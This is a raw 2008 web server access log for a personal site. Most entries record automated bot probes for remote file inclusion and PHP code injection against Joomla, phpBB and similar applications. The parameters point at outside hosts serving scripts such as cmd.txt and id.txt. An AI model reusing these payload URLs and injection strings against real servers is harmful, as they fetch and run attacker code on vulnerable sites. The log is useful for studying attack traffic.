64.207.204.13 - - [01/May/2008:09:12:42 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:42 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:43 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:43 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:43 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:43 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.168.250.60 - - [01/May/2008:09:12:46 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
200.168.250.60 - - [01/May/2008:09:12:46 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:12:46 -0700] "GET /logs/access_080210.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:12:48 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:12:48 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:12:48 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:49 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:52 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:12:54 -0700] "GET /logs/access_080210.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [01/May/2008:09:12:55 -0700] "GET /logs/access_071225.log/admin.php?cal_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [01/May/2008:09:12:55 -0700] "GET /admin.php?cal_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [01/May/2008:09:12:55 -0700] "GET /logs/admin.php?cal_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:57 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:58 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:59 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:13:01 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:13:01 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:13:01 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:13:03 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:13:04 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:13:04 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:13:04 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:13:05 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:13:05 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:13:05 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:13:08 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:13:08 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:13:12 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:13:12 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:13:13 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:13:22 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:14:28 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:14:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:14:35 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
12.53.219.68 - - [01/May/2008:09:14:38 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [01/May/2008:09:14:42 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [01/May/2008:09:14:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.133 - - [01/May/2008:09:15:06 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.133 - - [01/May/2008:09:15:06 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.133 - - [01/May/2008:09:15:07 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.19.6.245 - - [01/May/2008:09:15:07 -0700] "GET /logs/access_080205.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [01/May/2008:09:15:07 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [01/May/2008:09:15:08 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.80.202.91 - - [01/May/2008:09:15:18 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [01/May/2008:09:15:19 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [01/May/2008:09:15:19 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:15:23 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [01/May/2008:09:15:30 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:15:39 -0700] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:15:46 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:15:46 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.87.89 - - [01/May/2008:09:15:50 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.87.89 - - [01/May/2008:09:15:51 -0700] "GET //admin/index.php?o=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.87.89 - - [01/May/2008:09:15:51 -0700] "GET /logs//admin/index.php?o=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:15:54 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:15:54 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:15:54 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:16:03 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:16:12 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.121.209.1 - - [01/May/2008:09:16:15 -0700] "GET /logs/access_080218.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:16:18 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
77.221.130.16 - - [01/May/2008:09:16:33 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.16.180 - - [01/May/2008:09:16:55 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [01/May/2008:09:16:56 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [01/May/2008:09:16:56 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.19.6.245 - - [01/May/2008:09:17:01 -0700] "GET /logs/access_080210.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:17:19 -0700] "GET /logs/access_080312.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.133 - - [01/May/2008:09:17:20 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:17:29 -0700] "GET /logs/access_080126.log//components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:17:30 -0700] "GET /logs/access_080126.log//components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:17:30 -0700] "GET /logs/access_080126.log//components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:17:48 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.167.112.55 - - [01/May/2008:09:18:03 -0700] "GET /logs/access_071210.log HTTP/1.1" 200 177334 "http://search.msn.com/results.aspx?q=euphoria.gr&first=21&FORM=PERE2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.0 (build 02053); .NET CLR 1.1.4322)" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:18:22 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:18:22 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:18:26 -0700] "GET /logs/access_080312.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.61 - - [01/May/2008:09:18:31 -0700] "GET /bikes/dteel/2008_02_08/?M=D HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:18:32 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:18:32 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.122.1.59 - - [01/May/2008:09:18:36 -0700] "GET /logs/access.log/index.php?place=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.128.57 - - [01/May/2008:09:19:01 -0700] "GET /index.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.133 - - [01/May/2008:09:19:01 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.133 - - [01/May/2008:09:19:02 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:19:10 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:19:10 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.108.82 - - [01/May/2008:09:19:20 -0700] "GET /logs/access_080218.log//codebb/lang_select?phpbb_root_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.165.87.89 - - [01/May/2008:09:19:36 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.87.89 - - [01/May/2008:09:19:36 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.167.112.55 - - [01/May/2008:09:19:40 -0700] "GET / HTTP/1.1" 200 11602 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.0 (build 02053); .NET CLR 1.1.4322)" "dmulk.com"
83.167.112.55 - - [01/May/2008:09:19:41 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.0 (build 02053); .NET CLR 1.1.4322)" "dmulk.com"
61.63.9.163 - - [01/May/2008:09:19:42 -0700] "GET /logs/access.log/index.php?sayfa=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [01/May/2008:09:19:49 -0700] "GET /index.php?sayfa=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [01/May/2008:09:19:51 -0700] "GET /logs/index.php?sayfa=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
83.167.112.55 - - [01/May/2008:09:20:01 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.0 (build 02053); .NET CLR 1.1.4322)" "dmulk.com"
83.167.112.55 - - [01/May/2008:09:20:12 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.0 (build 02053); .NET CLR 1.1.4322)" "dmulk.com"
217.26.209.233 - - [01/May/2008:09:20:15 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [01/May/2008:09:20:16 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.168.63.202 - - [01/May/2008:09:20:23 -0700] "GET /logs/access_071225.log HTTP/1.1" 200 195051 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; PeoplePal 3.0; IEMB3; IEMB3)" "www.dmulk.com"
210.86.181.227 - - [01/May/2008:09:20:24 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [01/May/2008:09:20:25 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.168.63.202 - - [01/May/2008:09:20:27 -0700] "GET /logs/access_071225.log HTTP/1.1" 200 195051 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; PeoplePal 3.0; IEMB3; IEMB3)" "www.dmulk.com"
83.167.112.55 - - [01/May/2008:09:20:38 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.0 (build 02053); .NET CLR 1.1.4322)" "dmulk.com"
83.167.112.55 - - [01/May/2008:09:20:40 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.0 (build 02053); .NET CLR 1.1.4322)" "dmulk.com"
83.167.112.55 - - [01/May/2008:09:20:43 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 327680 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.0 (build 02053); .NET CLR 1.1.4322)" "dmulk.com"
210.109.102.108 - - [01/May/2008:09:20:50 -0700] "GET /logs/index.php?redir=http://69.64.50.43/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.176.161.208 - - [01/May/2008:09:20:52 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://sulawesi.us/xpl/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.176.161.208 - - [01/May/2008:09:20:53 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://sulawesi.us/xpl/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
